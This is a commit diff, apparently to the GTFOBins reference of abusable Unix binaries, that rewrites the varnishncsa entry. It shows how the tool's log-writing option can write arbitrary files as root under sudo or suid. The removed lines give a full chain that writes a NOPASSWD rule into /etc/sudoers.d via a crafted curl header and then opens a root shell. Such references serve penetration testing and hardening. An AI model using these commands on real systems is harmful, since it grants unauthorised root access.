Polish varnishncsa

This commit is contained in:
Andrea Cardaci 2023-12-23 12:40:09 +01:00 committed by GitHub
parent 0190295ed2
commit efaf1b11e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,8 +1,18 @@
---
description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
description: |
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
```
curl -H 'yyy: DATA' http://localhost:6081/xxx
```
description:
functions:
sudo:
- code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
- code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
- code: sudo bash
---
sudo:
code: |
LFILE=file_to_write
sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
suid:
code: |
LFILE=file_to_write
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
---